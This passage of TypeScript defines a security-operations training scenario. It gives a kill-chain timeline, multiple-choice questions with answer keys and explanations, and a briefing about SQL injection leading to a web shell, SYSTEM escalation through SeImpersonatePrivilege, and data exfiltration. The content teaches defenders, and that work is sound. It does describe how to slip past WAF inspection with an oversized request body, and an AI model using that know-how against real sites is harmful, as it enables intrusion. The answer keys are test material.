    { ts: T(38 * MIN), phase: "Collection", action: "UNION against dbo.Customers returns 42,318 rows as shopportal_app" },
    { ts: T(44 * MIN), phase: "Credential Access", action: "dbo.AppSettings read out through the same injection — deploy key disclosed" },
    { ts: T(47 * MIN), phase: "Persistence", action: "Web shell bootstrap.bundle.aspx written to the webroot by w3wp.exe (IIS APPPOOL\\ShopPortal)" },
    { ts: T(52 * MIN), phase: "Execution", action: "cmd.exe spawned by w3wp.exe at Medium integrity as the app pool account" },
    { ts: T(58 * MIN), phase: "Privilege Escalation", action: "srv.exe abuses SeImpersonatePrivilege to spawn cmd.exe as NT AUTHORITY\\SYSTEM" },
    { ts: T(64 * MIN), phase: "Exfiltration", action: "curl.exe uploads 3,312,486 bytes to cdn-shopassets.link over HTTPS" },
  ];

  const questions: ScenarioQuestion[] = [
    {
      id: "q1",
      prompt:
        "Three sources in this timeline triggered SQL injection signatures. Which one is scanning noise rather than exploitation, and on what evidence?",
      hint: "Compare the source addresses, the User-Agent strings, and whether anything downstream ever changed.",
      kind: "single",
      options: [
        { value: "qualys", label: "64.39.106.131 — a single fixed IP, a self-identifying scanner User-Agent, every payload blocked, and no database or endpoint activity follows it" },
        { value: "atk_a", label: "45.146.130.72 — its requests all returned 404 or 403, so nothing it sent ever reached application code or produced a result" },
        { value: "atk_c", label: "91.242.229.35 — it used an ordinary browser User-Agent and the WAF allowed it, which is what normal customer traffic looks like" },
        { value: "none", label: "None of them are noise — all three addresses sent the same payload families, so all three must be treated as active attackers" },
      ],
      answer: "qualys",
      xp: 80,
      explanation:
        "The Qualys address is inside the whitelisted ASV scanner range, never rotates, announces itself in the User-Agent, and is followed by no SQL Server Audit record and no endpoint activity. 45.146.130.72 is not noise: its 404 sweep is the reconnaissance that precedes the probes, and it is the first of three addresses in a rotation. 91.242.229.35 is the opposite of noise — it is the address whose request succeeded. Treating all three the same is what buries the real one: signature parity is not intent parity, and the discriminator is what happened downstream.",
    },
    {
      id: "q2",
      prompt: "Why did AWS WAF allow the request at 09:38 when it had blocked structurally similar payloads minutes earlier?",
      hint: "Read oversizeFields and the excludedRules entry in the ALLOW record together.",
      kind: "single",
      options: [
        { value: "oversize", label: "The 12,438-byte body exceeded the 8 KB body-inspection limit, and SizeRestrictions_BODY was overridden to count-only, so the oversized request was passed on uninspected" },
        { value: "iprep", label: "The source address had a clean reputation and no matching entry in the IP reputation rule group, so the web ACL short-circuited evaluation before the SQLi rules ran" },
        { value: "method", label: "The managed SQLi rule group only inspects GET query strings, so a POST request is never evaluated against SQL injection signatures by that rule group at all" },
        { value: "sensitivity", label: "The SQLi rule group was running at LOW sensitivity, which does not match UNION-based payloads and only detects simple tautologies such as OR 1=1" },
      ],
      answer: "oversize",
      xp: 100,
      explanation:
        "oversizeFields lists REQUEST_BODY: WAF saw the body was over the 8 KB regional inspection limit and inspected only the first 8 KB, and the injected fragment sat past that. SizeRestrictions_BODY, the rule that would normally block an oversized body, was set to count-only, so nothing stopped the request. The distractors each name a real mechanism used wrongly: reputation groups do not short-circuit later rule groups; the SQLi group inspects body and headers too, not just query strings; and LOW sensitivity still matches UNION patterns — it reduces false positives, it does not skip whole payload classes. The takeaway is that an ALLOW verdict means 'no rule terminated', not 'this request was examined and found safe'.",
    },
    {
      id: "q3",
      prompt:
        "The IIS access record for the successful request shows cIP 10.40.12.9, an internal address. What is the correct way to attribute that request to an external source?",
      hint: "Two events describe the same HTTP transaction from two different vantage points.",
      kind: "single",
      options: [
        { value: "waf_pivot", label: "Pivot to the AWS WAF ALLOW record for the same URI and timestamp — its httpRequest.clientIp holds the real caller, since IIS logs only the load balancer" },
        { value: "trust_iis", label: "Treat 10.40.12.9 as the attacker and hunt internally, because the web server's own access log is the authoritative record of who connected to it" },
        { value: "dns_lookup", label: "Resolve the csHost value back through DNS to obtain the public address that the storefront hostname pointed at when the request arrived" },
        { value: "edr_socket", label: "Use the Defender network events on WEB-SHOP-01, which record the remote address of every inbound socket the IIS worker process accepted" },
      ],
      answer: "waf_pivot",
      xp: 100,
      explanation:
        "IIS behind an ALB sees the load balancer as its peer, so cIP is 10.40.12.9 for every request and carries no attribution value. Only the WAF record, taken at the edge, holds httpRequest.clientIp = 91.242.229.35; matching it to the IIS record by URI, timestamp and the 12,438-byte csBytes value is the correlation. Chasing 10.40.12.9 sends the investigation into your own infrastructure. DNS resolves your hostname, not the caller's address. And the EDR network events in this timeline are outbound — inbound sockets terminate at the load balancer, not at the attacker.",
    },
    {
      id: "q4",
      prompt: "Immediately after the web shell's first command at 09:52, what privileges did the attacker actually hold on WEB-SHOP-01?",
      hint: "Read the account and integrity level on the cmd.exe process, then look at what changed six minutes later.",
      kind: "single",
      options: [
        { value: "apppool", label: "Only those of IIS APPPOOL\\ShopPortal at Medium integrity — SYSTEM was reached six minutes later by abusing SeImpersonatePrivilege, not by the shell itself" },
        { value: "system_now", label: "SYSTEM already, because IIS worker processes run under the local system account and every child they spawn inherits that same elevated token" },
        { value: "admin", label: "Local administrator, since writing a new file into C:\\inetpub\\wwwroot requires administrative rights on the web server's filesystem" },
        { value: "sqlsa", label: "Those of shopportal_app on the database server, because the shell was delivered through the SQL injection and inherits that login's server-level context" },
      ],
      answer: "apppool",
      xp: 100,
      explanation:
        "The 09:52 process shows AccountName ShopPortal, AccountDomain IIS APPPOOL, ProcessIntegrityLevel Medium — a constrained service identity. SYSTEM only appears at 09:58, after srv.exe uses the SeImpersonatePrivilege that the 4672 record at the top of the timeline shows the app pool was granted; that is the Potato-family pattern and it is a separate, visible step. w3wp.exe does not run as SYSTEM under any default configuration. The webroot is writable by the app pool identity by design, so the file write proves nothing about admin rights. And a SQL login grants database permissions, not a Windows token on the web server.",
    },
    {
      id: "q5",
      prompt: "Which MITRE ATT&CK techniques are evidenced in this timeline? (select all that apply)",
      kind: "multi",
      options: [
        { value: "T1190", label: "T1190 — Exploit Public-Facing Application (the injection that IIS answered with 200)" },
        { value: "T1213", label: "T1213 — Data from Information Repositories (42,318 rows read from dbo.Customers)" },
        { value: "T1505.003", label: "T1505.003 — Server Software Component: Web Shell (bootstrap.bundle.aspx in the webroot)" },
        { value: "T1134.001", label: "T1134.001 — Access Token Manipulation: Token Impersonation (SeImpersonate abuse to SYSTEM)" },
        { value: "T1078.002", label: "T1078.002 — Valid Accounts: Domain Accounts (reuse of a stolen domain credential)" },
      ],
      answer: ["T1190", "T1213", "T1505.003", "T1134.001"],
      xp: 120,
      explanation:
        "T1190 covers the successful injection against the internet-facing application; T1213 covers the bulk read of a business data repository through it; T1505.003 is the .aspx web shell persisted in the webroot; T1134.001 is the SeImpersonatePrivilege abuse that produced the SYSTEM token. T1078.002 is not present — no domain account is ever authenticated in this chain. The only identities involved are a SQL login (shopportal_app), a local IIS virtual account, and finally SYSTEM, all reached without a single stolen user credential. Also worth noting: the AppSettings read maps to T1552 (Unsecured Credentials) and the command execution to T1059.003, so a complete mapping is broader than these five options.",
    },
  ];

  return {
    scenario_id: scenarioId,
    title: "SQL Injection → Web Shell → Server Compromise",
    threat_actor: "TA-BRASSVINE (opportunistic web exploitation crew)",
    attack_kind: "web_exploitation",
    briefing: "Two alerts for shop.cryotech.com are queued: a burst of blocked SQL injection attempts against the site this morning, and a Defender for Endpoint detection on WEB-SHOP-01 at 09:52 involving the IIS worker process. The quarterly PCI ASV scan is also running today.",
    narrative: `Cryotech's storefront, shop.cryotech.com, runs on IIS on WEB-SHOP-01 behind an ALB with an AWS WAF web ACL and the AWS managed rule sets enabled. On Tuesday 17 March the SOC's WAF dashboard looks healthy: dozens of SQL injection attempts, all blocked, 403 across the board. Some of them are the authorized quarterly PCI ASV scan; some of them are not.

At 09:38 a single POST to an inventory lookup API — 12,438 bytes of JSON, an ordinary browser User-Agent, a source address that had not appeared before — is allowed through. IIS answers it with 200 and 3.3 MB. Nine minutes later a file called bootstrap.bundle.aspx appears in the site's JavaScript vendor folder, written there by the IIS worker process itself. By 10:04 something running as SYSTEM is uploading data to an external host.

Your job: work out which of the blocked events mattered and which were noise, explain in the WAF's own log fields why the one request that counted was never inspected, correlate the edge record with the web server record when the access log only knows about the load balancer, and state precisely what privileges the attacker held at each stage — including the moment they stopped being a web application and became the server.`,
    learning_objectives: [
      "Trace a web application attack across four telemetry planes — WAF, web server access log, database audit, and endpoint EDR",
      "Explain, from WAF log fields alone, why an ALLOW verdict is not evidence that a request was inspected or safe",
      "Correlate a WAF record with a web server access log when the access log records only the load balancer's address",
      "Separate authorized vulnerability-scanning noise from genuine exploitation that fires the same signatures",
      "Establish the privilege chain of a web shell — service account first, and an explicit escalation event before any SYSTEM activity",
    ],
    alerts: [], // alerts are attached by the catalogue wiring
    events,
    iocs,
    killchain,
    questions,
  };
}
